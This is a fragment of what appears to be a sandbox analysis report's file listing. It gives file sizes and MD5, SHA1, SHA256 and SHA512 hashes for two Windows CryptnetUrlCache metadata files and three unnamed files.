SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD5cc4afda886fbe13edcb738fc4290372b
SHA1e7f119a9608aa9809d2499e6805e1f8b99092350
SHA256fe4046a38b442af2bab05294fc0f0633bf5a099df8363fef16214f1b9fc34b0c
SHA512699fac7249bed81f86c90f21a3565a354dbfb4ff88635eec714d11d1063813fc6687469ece1f647071684dcda2b0facf7e7e3555052530d506cf3070019894db
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5ea25bbb376a6d2615af58a49a56a080a
SHA1ee6cb63be6e3eebf0414843a2b83cf64031a8ace
SHA256f69a6be591f488c00419f596c9dc68fbb148e92b32ff8593ee61071a761d5261
SHA512ee344701876a650b73250d71c351068dc6618c1fcc423dfd2bfcea54553cef6e97df7cddf3038a5e276812b17f06084471a33a961db7305dbecbe076caab22f3
-
Filesize
4.6MB
MD549c7e48e5042370f257afca33469245c
SHA1c63c7511081d5dcd7ed85231bde1017b064b489a
SHA25628eac29da55bc960d83a115a1930a179d9b6f9f5bd0ba58785adf0c37c535b0e
SHA512090753cd96f2d214062b2dfc3d45fddee007f5a0986d74aa9d6688e413e5ad64bee42623eb65dc7783a5f73d6f09a9c7c90c7fba249444eaeaf438b6a15e87b7
-
Filesize
1.9MB
MD547ccb0e28d73f695c5d5266ffbb300ec
SHA163e6167944df951ad2d279d0b64e37bf2f604c07
SHA25612d1bac765448db638adc8327de1101e5e2eb5829b8da7edd5b216a45c717eec
SHA5128219f5cfd7a6bf28b8880529240e0b49a2fd78c0c5227cf6471cbf153fd32b2664ae31396d4b6897c2686e5b7826b9f9dad434e82e7032c7a5aa3ee9b2771145
-
Filesize
15KB
MD5510e9f1b27a8014cdf1e19409cb4e532
SHA1a92933454a63421352a003fbad17c64c48c95108
SHA256b215fed98c963670e354b97368cdea240e0aa36f6f322e0871359d92956380cc
SHA51243165ee017808e1ccf2cebc8022564e9d06f1859d32f0c5e45c01c744df20a4eb808bdd242f5ea952df2276bfab41276bdfdf9dc7fe1f8b2bb4e34c49f3dc382